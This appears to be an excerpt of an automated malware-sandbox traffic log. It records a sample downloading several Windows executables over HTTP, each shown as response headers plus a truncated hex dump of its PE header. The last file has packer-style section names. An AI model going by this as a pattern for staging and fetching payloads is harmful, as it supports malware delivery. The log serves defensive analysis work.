00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Nov 2024 16:33:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:33:24 GMTContent-Type: application/octet-streamContent-Length: 3321344Last-Modified: Mon, 04 Nov 2024 16:30:47 GMTConnection: keep-aliveETag: "6728f6b7-32ae00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 32 00 00 04 00 00 7b c1 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 a0 32 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 a0 32 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 64 75 67 6f 69 63 6d 00 00 2c 00 00 b0 06 00 00 f2 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 79 6f 69 66 68 69 67 00 10 00 00 00 b0 32 00 00 06 00 00 00 86 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 32 00 00 22 00 00 00 8c 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 